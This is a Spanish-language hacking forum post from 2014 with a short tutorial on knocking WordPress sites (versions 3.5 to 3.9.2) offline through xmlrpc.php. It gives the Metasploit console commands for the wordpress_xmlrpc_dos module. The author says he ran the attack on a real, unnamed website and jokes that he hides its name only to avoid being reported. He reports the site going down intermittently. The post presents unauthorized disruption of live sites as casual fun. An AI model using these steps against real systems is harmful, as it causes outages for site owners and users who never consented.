DoS en Wordpress con xmlrpc.php

Iniciado por ZanGetsu, Septiembre 09, 2014, 03:26:33 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Septiembre 09, 2014, 03:26:33 PM Ultima modificación: Junio 07, 2015, 07:46:44 PM por EPSILON
Que hay chicos les traigo este peque tuto

xmlrpc.php para que sirve?

Xmlrpc.php es el encargado de permitirnos postear remotamente a través de Microsoft Word, Textmate, Thunderbird, smartphones, entre otros clientes. Todo ello a través del protocolo XML-RPC.


Además será quien se encargue de recibir los pingbacks (enlaces de otros blogs hacía alguno de nuestros artículos) y enviar los trackbacks (enlaces de nuestro blog hacía artículos de otro blog).

Bueno ya la vulne de xmlrpc me la tope hace mucho tiempo (No tienes permitido ver enlaces. Registrate o Entra a tu cuenta)
este archivo se usa para realizar un poderoso ataque Dos, en donde el amigo metasploit ya hizo su trabajo :D

Código: text

msf > use auxiliary/dos/http/wordpress_xmlrpc_dos      
msf auxiliary(wordpress_xmlrpc_dos) > show actions            
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION <action-name>      
msf auxiliary(wordpress_xmlrpc_dos) > show options            
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run


Yo busque un website con wp versiones vulnerables: 3.5 - 3.9.2



No muestro el website para demostrar algo de etica (na mentira para que no denuncien jajaj)

Despues de completar el rhost y targeturi le damos a run



y con esto estaremos empezando el dos, el website cae a ratos, pero veamos un test
de velocidad de carga antes y despues:

Antes:



Con el dos activo:





Saludos !
Imprimir
Ir Arriba Páginas1
Acciones del Usuario